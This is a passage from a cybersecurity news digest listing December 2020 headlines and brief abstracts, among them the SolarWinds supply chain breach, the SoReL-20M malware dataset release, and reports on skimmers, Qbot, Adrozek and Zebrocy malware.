Unit 42 researchers have been tracking the threat group AridViper, which has been targeting the Middle Eastern region, and identified a new information stealer with relations to the MICROPSIA malware.Palo Alto Networks
December 14, 2020
The SolarWinds Breach: Why Your Work Computers Are Down Today Full Text
Abstract
The information security news cycle went into overdrive yesterday afternoon. First, Reuters revealed that the Commerce and Treasury departments suffered significant intrusions. The Washington Post soon followed up with multiple sources attributing the attack to the Russian foreign intelligence service, the SVR—in particular, a portion of the SVR known as Cozy Bear—although there is no official attribution yet. Within a few hours, FireEye and Microsoft announced that this was a “supply chain attack” involving SolarWinds Orion software, and the Cybersecurity and Infrastructure Security Agency (CISA) issued an emergency directive. Today, it turns out that the attackers also compromised the Department of Homeland Security. SolarWinds revealed to the Securities and Exchange Commission that the breach may affect 18,000 customers.Lawfare
December 14, 2020
SoReL-20M: A Huge Dataset of 20 Million Malware Samples Released Online Full Text
Abstract
Cybersecurity firms Sophos and ReversingLabs on Monday jointly released the first-ever production-scale malware research dataset to be made available to the general public that aims to build effective defenses and drive industry-wide improvements in security detection and response. "SoReL-20M" (short for Sophos-ReversingLabs – 20 Million), as it's called, is a dataset containing metadata, labels, and features for 20 million Windows Portable Executable (.PE) files, including 10 million disarmed malware samples, with the goal of devising machine-learning approaches for better malware detection capabilities. "Open knowledge and understanding about cyber threats also leads to more predictive cybersecurity," Sophos AI group said. "Defenders will be able to anticipate what attackers are doing and be better prepared for their next move." Accompanying the release are a set of PyTorch and LightGBM-based machine learning models pre-trainedThe Hacker News
December 14, 2020
Hacking group’s new malware abuses Google and Facebook services Full Text
Abstract
Molerats cyberespionage group has been using in recent spear-phishing campaigns fresh malware that relies on Dropbox, Google Drive, and Facebook for command and control communication and to store stolen data.BleepingComputer
December 11, 2020
Skimmers hide in social media buttons and CSS files, but the next big threat lies with the server Full Text
Abstract
Happy shopping: Beyond standard skimming techniques that focus on the client-side, attackers are increasingly focusing on back-end applications.SCMagazine
December 11, 2020
Microsoft: New malware can infect over 30K Windows PCs a day Full Text
Abstract
Microsoft has warned of an ongoing campaign pushing a new browser hijacking and credential-stealing malware dubbed Adrozek which, at its peak, was able to take over more than 30,000 devices every day.BleepingComputer
December 10, 2020
Hackers can use WinZip insecure server connection to drop malware Full Text
Abstract
The server-client communication in certain versions of the WinZip file compression tool is insecure and could be modified to serve malware or fraudulent content to users.BleepingComputer
December 09, 2020
Qbot malware switched to stealthy new Windows autostart method Full Text
Abstract
A new Qbot malware version now activates its persistence mechanism right before infected Windows devices shut down, and it automatically removes any traces when the system restarts or wakes up from sleep.BleepingComputer
December 09, 2020
Credit card stealer hides in CSS files of hacked online stores Full Text
Abstract
Credit card stealer scripts are evolving and becoming increasingly harder to detect due to novel hiding tactics. The latest example is a web skimmer that uses CSS code to blend within the pages of a compromised store and to steal customers' personal and payment information.BleepingComputer
December 09, 2020
Russian hackers hide Zebrocy malware in virtual disk images Full Text
Abstract
Russian-speaking hackers behind Zebrocy malware have changed their technique for delivering malware to high-profile victims and started to pack the threats in Virtual Hard Drives (VHD) to avoid detection.BleepingComputer
October 29, 2020
MAR-10310246-2.v1 – PowerShell Script: ComRAT Full Text